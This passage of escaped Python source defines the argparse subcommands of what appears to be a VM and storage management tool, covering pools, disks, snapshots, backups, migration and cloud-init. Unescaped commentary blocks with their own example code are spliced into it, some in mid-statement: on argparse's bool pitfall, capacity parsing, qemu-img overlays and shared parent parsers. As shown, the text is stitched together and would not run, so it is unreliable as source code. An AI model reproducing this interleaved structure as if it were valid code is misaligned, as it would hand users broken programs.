help\")\nparser_stop_pool.add_argument(\"--type\", 
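`--autostart` above is wired as `type=bool, nargs='?', const=True`. That behaves as expected for the bare flag, but if a caller ever passes an explicit value, `bool(...)` on any non-empty string, including 'False', is True. `action='store_true'` sidesteps the trap; a small demonstration:

import argparse

p = argparse.ArgumentParser()
p.add_argument('--autostart-bool', type=bool, nargs='?', const=True)
p.add_argument('--autostart-flag', action='store_true')

# bool() on a non-empty string is always True, so an explicit value misleads:
assert p.parse_args(['--autostart-bool', 'False']).autostart_bool is True
# store_true has no value form at all, which removes the ambiguity:
assert p.parse_args(['--autostart-flag']).autostart_flag is True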
required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\n\nparser_stop_pool.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool name to stop\")\n# set default func\nparser_stop_pool.set_defaults(func=stopPoolParser)\n\n# -------------------- add showPool cmd ----------------------------------\nparser_show_pool = subparsers.add_parser(\"showPool\", help=\"showPool help\")\nparser_show_pool.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\n\nparser_show_pool.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool name to show\")\n# set default func\nparser_show_pool.set_defaults(func=showPoolParser)\n\n# -------------------- add createDisk cmd ----------------------------------\nparser_create_disk = subparsers.add_parser(\"createDisk\", help=\"createDisk help\")\nparser_create_disk.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"disk type to use\")\nparser_create_disk.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool to use\")\n\nparser_create_disk.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"volume name to use\")\n\n# will transfer to --size when type in nfs or glusterfs\nparser_create_disk.add_argument(\"--capacity\", required=True, metavar=\"[CAPACITY]\", type=str,\n help=\"capacity is the size of the volume to be created, as a scaled integer (see NOTES above), defaulting to bytes\")\nparser_create_disk.add_argument(\"--format\", metavar=\"[raw|bochs|qcow|qcow2|vmdk|qed]\", type=str,\n help=\"format is used in file based storage pools to specify the volume file format to use; raw, bochs, qcow, qcow2, vmdk, qed.\")\n\n# set default func\nparser_create_disk.set_defaults(func=createDiskParser)\n\n# -------------------- add deleteDisk cmd ----------------------------------\nparser_delete_disk = subparsers.add_parser(\"deleteDisk\", help=\"deleteDisk help\")\nparser_delete_disk.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\nparser_delete_disk.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool to use\")\nparser_delete_disk.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"volume name to use\")\n# set default func\nparser_delete_disk.set_defaults(func=deleteDiskParser)\n\n# -------------------- add resizeDisk cmd ----------------------------------\nparser_resize_disk = subparsers.add_parser(\"resizeDisk\", help=\"resizeDisk help\")\nparser_resize_disk.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\nparser_resize_disk.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool to use\")\nparser_resize_disk.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"volume name to use\")\nparser_resize_disk.add_argument(\"--capacity\", required=True, metavar=\"[CAPACITY]\", type=str,\n help=\"new volume capacity to use\")\nparser_resize_disk.add_argument(\"--vmname\", metavar=\"[VMNAME]\", type=str,\n help=\"new volume capacity to use\")\n# set default func\nparser_resize_disk.set_defaults(func=resizeDiskParser)\n\n# -------------------- add cloneDisk cmd ----------------------------------\nparser_clone_disk = 
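The `--capacity` help above describes a scaled integer defaulting to bytes, in virsh style. A minimal parser for that convention (the single-letter suffix set is an assumption; virsh also accepts two-letter forms such as KiB):

import re

_SCALE = {'': 1, 'K': 1024, 'M': 1024**2, 'G': 1024**3, 'T': 1024**4}

def capacity_to_bytes(text):
    # Accepts forms like '1048576', '512M', '10G'; bare numbers are bytes.
    m = re.match(r'^(\d+)([KMGT]?)$', text.strip().upper())
    if m is None:
        raise ValueError('bad capacity: %r' % text)
    return int(m.group(1)) * _SCALE[m.group(2)]

assert capacity_to_bytes('10G') == 10 * 1024**3
assert capacity_to_bytes('4096') == 4096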
subparsers.add_parser(\"cloneDisk\", help=\"cloneDisk help\")\nparser_clone_disk.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\nparser_clone_disk.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool to use\")\nparser_clone_disk.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"volume name to use\")\nparser_clone_disk.add_argument(\"--newname\", required=True, metavar=\"[NEWNAME]\", type=str,\n help=\"new volume name to use\")\nparser_clone_disk.add_argument(\"--format\", required=True, metavar=\"[FORMAT]\", type=str,\n help=\"format to use\")\n# set default func\nparser_clone_disk.set_defaults(func=cloneDiskParser)\n\n# -------------------- add registerDiskToK8s cmd ----------------------------------\nparser_register_disk = subparsers.add_parser(\"registerDiskToK8s\", help=\"register disk to k8s help\")\nparser_register_disk.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool to use\")\nparser_register_disk.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"volume name to use\")\n# set default func\nparser_register_disk.set_defaults(func=registerDiskToK8sParser)\n\n# -------------------- add rebaseDiskSnapshot cmd ----------------------------------\nparser_rebase_snapshot = subparsers.add_parser(\"rebaseDiskSnapshot\", help=\"rebase disk snapshot help\")\nparser_rebase_snapshot.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool to use\")\nparser_rebase_snapshot.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"volume name to use\")\n# set default func\nparser_rebase_snapshot.set_defaults(func=rebaseDiskSnapshotParser)\n\n# -------------------- add prepareDisk cmd ----------------------------------\nparser_prepare_disk = subparsers.add_parser(\"prepareDisk\", help=\"prepareDisk help\")\nparser_prepare_disk.add_argument(\"--domain\", metavar=\"[DOMAIN]\", type=str,\n help=\"storage pool to use\")\nparser_prepare_disk.add_argument(\"--vol\", metavar=\"[VOL]\", type=str,\n help=\"volume name to use\")\nparser_prepare_disk.add_argument(\"--path\", metavar=\"[PATH]\", type=str,\n help=\"volume uni to use\")\n# set default func\nparser_prepare_disk.set_defaults(func=prepareDiskParser)\n\n# -------------------- add releaseDisk cmd ----------------------------------\nparser_release_disk = subparsers.add_parser(\"releaseDisk\", help=\"releaseDisk help\")\nparser_release_disk.add_argument(\"--domain\", metavar=\"[DOMAIN]\", type=str,\n help=\"domain to use\")\nparser_release_disk.add_argument(\"--vol\", metavar=\"[VOL]\", type=str,\n help=\"volume name to use\")\nparser_release_disk.add_argument(\"--path\", metavar=\"[PATH]\", type=str,\n help=\"volume path to use\")\n# set default func\nparser_release_disk.set_defaults(func=releaseDiskParser)\n\n# -------------------- add showDisk cmd ----------------------------------\nparser_show_disk = subparsers.add_parser(\"showDisk\", help=\"showDisk help\")\nparser_show_disk.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\nparser_show_disk.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool to use\")\nparser_show_disk.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"volume name to use\")\n# set default 
func\nparser_show_disk.set_defaults(func=showDiskParser)\n\n# -------------------- add showDiskSnapshot cmd ----------------------------------\nparser_show_disk_snapshot = subparsers.add_parser(\"showDiskSnapshot\", help=\"showDiskSnapshot help\")\nparser_show_disk_snapshot.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\nparser_show_disk_snapshot.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool to use\")\nparser_show_disk_snapshot.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"volume name to use\")\nparser_show_disk_snapshot.add_argument(\"--name\", required=True, metavar=\"[NAME]\", type=str,\n help=\"volume snapshot name\")\n# set default func\nparser_show_disk_snapshot.set_defaults(func=showDiskSnapshotParser)\n\n# -------------------- add createExternalSnapshot cmd ----------------------------------\nparser_create_ess = subparsers.add_parser(\"createExternalSnapshot\", help=\"createExternalSnapshot help\")\nparser_create_ess.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\nparser_create_ess.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool to use\")\nparser_create_ess.add_argument(\"--name\", required=True, metavar=\"[NAME]\", type=str,\n help=\"volume snapshot name to use\")\nparser_create_ess.add_argument(\"--format\", required=True, metavar=\"[FORMAT]\", type=str,\n help=\"disk format to use\")\nparser_create_ess.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"disk current file to use\")\nparser_create_ess.add_argument(\"--domain\", metavar=\"[domain]\", type=str,\n help=\"domain\")\n# set default func\nparser_create_ess.set_defaults(func=createExternalSnapshotParser)\n\n# -------------------- add revertExternalSnapshot cmd ----------------------------------\nparser_revert_ess = subparsers.add_parser(\"revertExternalSnapshot\", help=\"revertExternalSnapshot help\")\nparser_revert_ess.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\nparser_revert_ess.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool to use\")\nparser_revert_ess.add_argument(\"--name\", required=True, metavar=\"[NAME]\", type=str,\n help=\"volume snapshot name to use\")\nparser_revert_ess.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"disk current file to use\")\nparser_revert_ess.add_argument(\"--format\", required=True, metavar=\"[FORMAT]\", type=str,\n help=\"disk format to use\")\nparser_revert_ess.add_argument(\"--domain\", metavar=\"[domain]\", type=str,\n help=\"domain\")\n# set default func\nparser_revert_ess.set_defaults(func=revertExternalSnapshotParser)\n\n# -------------------- add deleteExternalSnapshot cmd ----------------------------------\nparser_delete_ess = subparsers.add_parser(\"deleteExternalSnapshot\", help=\"deleteExternalSnapshot help\")\nparser_delete_ess.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\nparser_delete_ess.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool to use\")\nparser_delete_ess.add_argument(\"--name\", required=True, metavar=\"[NAME]\", type=str,\n help=\"volume snapshot name to 
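The three external-snapshot subcommands above manage a qcow2 overlay chain. For orientation, this is the same operation plain qemu-img performs when it creates an overlay on top of the current image (the paths are hypothetical, and `-F` requires a reasonably recent qemu-img):

import subprocess

def create_external_snapshot(base, overlay):
    # A qcow2 external snapshot is just a new overlay whose backing file is
    # the old current image; writes go to the overlay, the base stays frozen.
    subprocess.check_call([
        'qemu-img', 'create', '-f', 'qcow2',
        '-b', base, '-F', 'qcow2', overlay,
    ])

# Hypothetical chain: after this call, 'snap1' becomes the new current file.
# create_external_snapshot('/pool/vol1/vol1', '/pool/vol1/snapshots/snap1')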
use\")\nparser_delete_ess.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"disk current file to use\")\nparser_delete_ess.add_argument(\"--domain\", metavar=\"[domain]\", type=str,\n help=\"domain\")\n# set default func\nparser_delete_ess.set_defaults(func=deleteExternalSnapshotParser)\n\n# -------------------- add updateDiskCurrent cmd ----------------------------------\nparser_upodate_current = subparsers.add_parser(\"updateDiskCurrent\", help=\"updateDiskCurrent help\")\nparser_upodate_current.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\nparser_upodate_current.add_argument(\"--current\", required=True, metavar=\"[CURRENT]\", type=str, nargs='*',\n help=\"disk current file to use\")\n# set default func\nparser_upodate_current.set_defaults(func=updateDiskCurrentParser)\n\n# -------------------- add customize cmd ----------------------------------\nparser_customize = subparsers.add_parser(\"customize\", help=\"customize help\")\nparser_customize.add_argument(\"--add\", required=True, metavar=\"[ADD]\", type=str,\n help=\"storage pool type to use\")\nparser_customize.add_argument(\"--user\", required=False, metavar=\"[USER]\", type=str,\n help=\"disk current file to use\")\nparser_customize.add_argument(\"--password\", required=False, metavar=\"[PASSWORD]\", type=str,\n help=\"disk current file to use\")\nparser_customize.add_argument(\"--ssh_inject\", required=False, metavar=\"[SSH_INJECT]\", type=str,\n help=\"disk ssh-inject\")\n# set default func\nparser_customize.set_defaults(func=customizeParser)\n\n# -------------------- add createDiskFromImage cmd ----------------------------------\nparser_create_disk_from_image = subparsers.add_parser(\"createDiskFromImage\", help=\"createDiskFromImage help\")\nparser_create_disk_from_image.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\nparser_create_disk_from_image.add_argument(\"--name\", required=True, metavar=\"[name]\", type=str,\n help=\"new disk name to use\")\nparser_create_disk_from_image.add_argument(\"--targetPool\", required=True, metavar=\"[targetPool]\", type=str,\n help=\"storage pool to use\")\nparser_create_disk_from_image.add_argument(\"--source\", required=True, metavar=\"[source]\", type=str,\n help=\"disk source to use\")\nparser_create_disk_from_image.add_argument(\"--full_copy\", metavar=\"[full_copy]\", type=bool, nargs='?', const=True,\n help=\"if full_copy, new disk will be created by snapshot\")\n# set default func\nparser_create_disk_from_image.set_defaults(func=createDiskFromImageParser)\n\n# -------------------- add migrate cmd ----------------------------------\nparser_migrate = subparsers.add_parser(\"migrate\", help=\"migrate help\")\nparser_migrate.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to migrate\")\nparser_migrate.add_argument(\"--ip\", required=True, metavar=\"[IP]\", type=str,\n help=\"storage pool type to use\")\nparser_migrate.add_argument(\"--offline\", metavar=\"[OFFLINE]\", type=bool, nargs='?', const=True,\n help=\"support migrate offline\")\n# set default func\nparser_migrate.set_defaults(func=migrateParser)\n\n# -------------------- add migrateDisk cmd ----------------------------------\nparser_migrate_disk = subparsers.add_parser(\"migrateDisk\", help=\"migrate disk help\")\nparser_migrate_disk.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n 
help=\"vol to migrate\")\nparser_migrate_disk.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"target storage pool to use\")\n# set default func\nparser_migrate_disk.set_defaults(func=migrateDiskParser)\n\n# -------------------- add migrateVMDisk cmd ----------------------------------\nparser_migrate_vm_disk = subparsers.add_parser(\"migrateVMDisk\", help=\"migrateVMDisk help\")\nparser_migrate_vm_disk.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to migrate\")\nparser_migrate_vm_disk.add_argument(\"--ip\", required=True, metavar=\"[IP]\", type=str,\n help=\"storage pool type to use\")\nparser_migrate_vm_disk.add_argument(\"--migratedisks\", required=True, metavar=\"[MIGRATEDISKS]\", type=str,\n help=\"vol opt to migrate\")\n# parser_migrate_vm_disk.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n# help=\"target storage pool to use\")\n# set default func\nparser_migrate_vm_disk.set_defaults(func=migrateVMDiskParser)\n\n# -------------------- add restoreDisk cmd ----------------------------------\nparser_change_disk_pool = subparsers.add_parser(\"changeDiskPool\", help=\"changeDiskPool help\")\nparser_change_disk_pool.add_argument(\"--xml\", required=True, metavar=\"[XML]\", type=str,\n help=\"vm disk to backup\")\n# set default func\nparser_change_disk_pool.set_defaults(func=changeDiskPoolParser)\n\n# -------------------- add migrateVMDisk cmd ----------------------------------\nparser_modify_vm = subparsers.add_parser(\"modifyVM\", help=\"modifyVM help\")\nparser_modify_vm.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to migrate\")\n# parser_migrate_vm_disk.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n# help=\"target storage pool to use\")\n# set default func\nparser_modify_vm.set_defaults(func=modifyVMParser)\n\n# -------------------- add exportVM cmd ----------------------------------\nparser_export_vm = subparsers.add_parser(\"exportVM\", help=\"exportVM help\")\nparser_export_vm.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_export_vm.add_argument(\"--path\", required=True, metavar=\"[PATH]\", type=str,\n help=\"vm disk file to export\")\n# set default func\nparser_export_vm.set_defaults(func=exportVMParser)\n\n# -------------------- add backupVM cmd ----------------------------------\nparser_backup_vm = subparsers.add_parser(\"backupVM\", help=\"backupVM help\")\nparser_backup_vm.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_backup_vm.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"vm domain backup pool, must shared type, like nfs\")\nparser_backup_vm.add_argument(\"--version\", required=True, metavar=\"[VERSION]\", type=str,\n help=\"backup version id\")\nparser_backup_vm.add_argument(\"--all\", required=False, metavar=\"[ALL]\", type=bool, nargs='?', const=True,\n help=\"all vm disk\")\nparser_backup_vm.add_argument(\"--full\", required=False, metavar=\"[FULL]\", type=bool, nargs='?', const=True,\n help=\"full backup\")\nparser_backup_vm.add_argument(\"--remote\", required=False, metavar=\"[REMOTE]\", type=str,\n help=\"remote server host.\")\nparser_backup_vm.add_argument(\"--port\", required=False, metavar=\"[PORT]\", type=str,\n help=\"remote server port.\")\nparser_backup_vm.add_argument(\"--username\", required=False, metavar=\"[REMOTE]\", 
type=str,\n help=\"remote server username.\")\nparser_backup_vm.add_argument(\"--password\", required=False, metavar=\"[REMOTE]\", type=str,\n help=\"remote server password.\")\n# set default func\nparser_backup_vm.set_defaults(func=backupVMParser)\n\n# -------------------- add restoreVM cmd ----------------------------------\nparser_restore_vm = subparsers.add_parser(\"restoreVM\", help=\"restoreVM help\")\nparser_restore_vm.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_restore_vm.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"vm domain backup pool, must shared type, like nfs\")\nparser_restore_vm.add_argument(\"--all\", required=False, metavar=\"[ALL]\", type=bool, nargs='?', const=True,\n help=\"all vm disk\")\nparser_restore_vm.add_argument(\"--version\", required=True, metavar=\"[VERSION]\", type=str,\n help=\"backup version id\")\nparser_restore_vm.add_argument(\"--newname\", required=False, metavar=\"[NEWNAME]\", type=str,\n help=\"name when create a new domain\")\nparser_restore_vm.add_argument(\"--target\", required=False, metavar=\"[TARGET]\", type=str,\n help=\"use target pool to create a new domain\")\n# set default func\nparser_restore_vm.set_defaults(func=restoreVMParser)\n\n# -------------------- add backupDisk cmd ----------------------------------\nparser_backup_disk = subparsers.add_parser(\"backupDisk\", help=\"backupDisk help\")\nparser_backup_disk.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"vm disk to backup\")\nparser_backup_disk.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_backup_disk.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"vm domain backup pool, must shared type, like nfs\")\nparser_backup_disk.add_argument(\"--version\", required=True, metavar=\"[VERSION]\", type=str,\n help=\"backup version id\")\nparser_backup_disk.add_argument(\"--full\", required=False, metavar=\"[FULL]\", type=bool, nargs='?', const=True,\n help=\"full backup\")\nparser_backup_disk.add_argument(\"--remote\", required=False, metavar=\"[REMOTE]\", type=str,\n help=\"remote server host.\")\nparser_backup_disk.add_argument(\"--port\", required=False, metavar=\"[PORT]\", type=str,\n help=\"remote server port.\")\nparser_backup_disk.add_argument(\"--username\", required=False, metavar=\"[REMOTE]\", type=str,\n help=\"remote server username.\")\nparser_backup_disk.add_argument(\"--password\", required=False, metavar=\"[REMOTE]\", type=str,\n help=\"remote server password.\")\n# set default func\nparser_backup_disk.set_defaults(func=backupDiskParser)\n\n# -------------------- add restoreDisk cmd ----------------------------------\nparser_restore_disk = subparsers.add_parser(\"restoreDisk\", help=\"restoreDisk help\")\nparser_restore_disk.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"vm disk to backup\")\nparser_restore_disk.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_restore_disk.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"vm domain backup pool, must shared type, like nfs\")\nparser_restore_disk.add_argument(\"--version\", required=True, metavar=\"[VERSION]\", type=str,\n help=\"backup version id\")\nparser_restore_disk.add_argument(\"--newname\", required=False, metavar=\"[NEWNAME]\", type=str,\n help=\"name when create a new 
domain\")\nparser_restore_disk.add_argument(\"--target\", required=False, metavar=\"[TARGET]\", type=str,\n help=\"use target pool to create a new domain\")\nparser_restore_disk.add_argument(\"--targetDomain\", required=False, metavar=\"[TARGETDOMAIN]\", type=str,\n help=\"target domain to attach disk\")\n# set default func\nparser_restore_disk.set_defaults(func=restoreDiskParser)\n\n# -------------------- add showDiskPool cmd ----------------------------------\nparser_show_disk_pool = subparsers.add_parser(\"showDiskPool\", help=\"showDiskPool help\")\nparser_show_disk_pool.add_argument(\"--path\", required=True, metavar=\"[PATH]\", type=str,\n help=\"vm disk path\")\n# set default func\nparser_show_disk_pool.set_defaults(func=showDiskPoolParser)\n\n# -------------------- add deleteVMBackup cmd ----------------------------------\nparser_delete_vm_backup = subparsers.add_parser(\"deleteVMBackup\", help=\"restoreVM help\")\nparser_delete_vm_backup.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_delete_vm_backup.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"vm domain backup pool, must shared type, like nfs\")\nparser_delete_vm_backup.add_argument(\"--version\", required=True, metavar=\"[VERSION]\", type=str,\n help=\"backup version id\")\n# set default func\nparser_delete_vm_backup.set_defaults(func=deleteVMBackupParser)\n\n# -------------------- add deleteVMDiskBackup cmd ----------------------------------\nparser_delete_vm_disk_backup = subparsers.add_parser(\"deleteVMDiskBackup\", help=\"restoreVM help\")\nparser_delete_vm_disk_backup.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_delete_vm_disk_backup.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"vm disk to backup\")\nparser_delete_vm_disk_backup.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"vm domain backup pool, must shared type, like nfs\")\nparser_delete_vm_disk_backup.add_argument(\"--version\", required=True, metavar=\"[VERSION]\", type=str,\n help=\"backup version id\")\n# set default func\nparser_delete_vm_disk_backup.set_defaults(func=deleteVMDiskBackupParser)\n\n# -------------------- add deleteRemoteBackup cmd ----------------------------------\nparser_delete_remote_backup = subparsers.add_parser(\"deleteRemoteBackup\", help=\"restoreVM help\")\nparser_delete_remote_backup.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_delete_remote_backup.add_argument(\"--vol\", required=False, metavar=\"[VOL]\", type=str,\n help=\"vm disk to backup\")\nparser_delete_remote_backup.add_argument(\"--pool\", required=False, metavar=\"[POOL]\", type=str,\n help=\"vm pool to backup\")\nparser_delete_remote_backup.add_argument(\"--version\", required=True, metavar=\"[VERSION]\", type=str,\n help=\"backup version id\")\nparser_delete_remote_backup.add_argument(\"--remote\", required=True, metavar=\"[REMOTE]\", type=str,\n help=\"remote server host.\")\nparser_delete_remote_backup.add_argument(\"--port\", required=True, metavar=\"[PORT]\", type=str,\n help=\"remote server port.\")\nparser_delete_remote_backup.add_argument(\"--username\", required=True, metavar=\"[USERNAME]\", type=str,\n help=\"remote server username.\")\nparser_delete_remote_backup.add_argument(\"--password\", required=True, metavar=\"[PASSWORD]\", type=str,\n help=\"remote server 
password.\")\n# set default func\nparser_delete_remote_backup.set_defaults(func=deleteRemoteBackupParser)\n\n# -------------------- add pullRemoteBackup cmd ----------------------------------\nparser_pull_remote_backup = subparsers.add_parser(\"pullRemoteBackup\", help=\"pullRemoteBackup help\")\nparser_pull_remote_backup.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_pull_remote_backup.add_argument(\"--vol\", required=False, metavar=\"[VOL]\", type=str,\n help=\"vm disk to backup\")\nparser_pull_remote_backup.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"backup to store\")\nparser_pull_remote_backup.add_argument(\"--version\", required=True, metavar=\"[VERSION]\", type=str,\n help=\"backup version id\")\nparser_pull_remote_backup.add_argument(\"--remote\", required=True, metavar=\"[REMOTE]\", type=str,\n help=\"remote server host.\")\nparser_pull_remote_backup.add_argument(\"--port\", required=True, metavar=\"[PORT]\", type=str,\n help=\"remote server port.\")\nparser_pull_remote_backup.add_argument(\"--username\", required=True, metavar=\"[USERNAME]\", type=str,\n help=\"remote server username.\")\nparser_pull_remote_backup.add_argument(\"--password\", required=True, metavar=\"[PASSWORD]\", type=str,\n help=\"remote server password.\")\n# set default func\nparser_pull_remote_backup.set_defaults(func=pullRemoteBackupParser)\n\n# -------------------- add pushBackup cmd ----------------------------------\nparser_push_backup = subparsers.add_parser(\"pushBackup\", help=\"pushBackup help\")\nparser_push_backup.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_push_backup.add_argument(\"--vol\", required=False, metavar=\"[VOL]\", type=str,\n help=\"vm disk to backup\")\nparser_push_backup.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"backup to store\")\nparser_push_backup.add_argument(\"--version\", required=True, metavar=\"[VERSION]\", type=str,\n help=\"backup version id\")\nparser_push_backup.add_argument(\"--remote\", required=True, metavar=\"[REMOTE]\", type=str,\n help=\"remote server host.\")\nparser_push_backup.add_argument(\"--port\", required=True, metavar=\"[PORT]\", type=str,\n help=\"remote server port.\")\nparser_push_backup.add_argument(\"--username\", required=True, metavar=\"[USERNAME]\", type=str,\n help=\"remote server username.\")\nparser_push_backup.add_argument(\"--password\", required=True, metavar=\"[PASSWORD]\", type=str,\n help=\"remote server password.\")\n# set default func\nparser_push_backup.set_defaults(func=pushBackupParser)\n\n# -------------------- add createCloudInitUserDataImage cmd ----------------------------------\nparser_create_cloud_init = subparsers.add_parser(\"createCloudInitUserDataImage\",\n help=\"createCloudInitUserDataImage help\")\nparser_create_cloud_init.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"backup to store\")\nparser_create_cloud_init.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"vol\")\nparser_create_cloud_init.add_argument(\"--userData\", required=False, metavar=\"[USERDATA]\", type=str,\n help=\"userData\")\n# set default func\nparser_create_cloud_init.set_defaults(func=createCloudInitUserDataImageParser)\n\n# -------------------- add createCloudInitUserDataImage cmd ----------------------------------\nparser_delete_cloud_init = 
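The remote/port/username/password quartet recurs verbatim across the remote-backup subcommands above. argparse's `parents=` mechanism lets it be declared once; a sketch of the refactor (standalone, not wired into the real parser):

import argparse

remote_parent = argparse.ArgumentParser(add_help=False)
remote_parent.add_argument('--remote', required=True, metavar='[REMOTE]', help='remote server host.')
remote_parent.add_argument('--port', required=True, metavar='[PORT]', help='remote server port.')
remote_parent.add_argument('--username', required=True, metavar='[USERNAME]', help='remote server username.')
remote_parent.add_argument('--password', required=True, metavar='[PASSWORD]', help='remote server password.')

parser = argparse.ArgumentParser(prog='kubesds-adm')
subparsers = parser.add_subparsers()
# Every subcommand that talks to a remote host inherits the four options:
pull = subparsers.add_parser('pullRemoteBackup', parents=[remote_parent])
pull.add_argument('--version', required=True, metavar='[VERSION]', help='backup version id')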
subparsers.add_parser(\"deleteCloudInitUserDataImage\",\n help=\"deleteCloudInitUserDataImage help\")\nparser_delete_cloud_init.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"backup to store\")\nparser_delete_cloud_init.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"vol\")\n# set default func\nparser_delete_cloud_init.set_defaults(func=deleteCloudInitUserDataImageParser)\n\n# -------------------- add createCloudInitUserDataImage cmd ----------------------------------\nparser_update_os = subparsers.add_parser(\"updateOS\", help=\"deleteCloudInitUserDataImage help\")\nparser_update_os.add_argument(\"--domain\", required=True, metavar=\"[POOL]\", type=str,\n help=\"backup to store\")\nparser_update_os.add_argument(\"--source\", required=True, metavar=\"[POOL]\", type=str,\n help=\"backup to store\")\nparser_update_os.add_argument(\"--target\", required=True, metavar=\"[VOL]\", type=str,\n help=\"vol\")\n# set default func\nparser_update_os.set_defaults(func=updateOSParser)\n\n# -------------------- add cleanBackup cmd ----------------------------------\nparser_clean_backup = subparsers.add_parser(\"cleanBackup\", help=\"cleanBackup help\")\nparser_clean_backup.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_clean_backup.add_argument(\"--vol\", required=False, metavar=\"[VOL]\", type=str,\n help=\"vm disk to backup\")\nparser_clean_backup.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"backup to store\")\nparser_clean_backup.add_argument(\"--version\", required=False, metavar=\"[VERSION]\", type=str,\n help=\"backup version id\")\nparser_clean_backup.add_argument(\"--all\", required=False, metavar=\"[ALL]\", 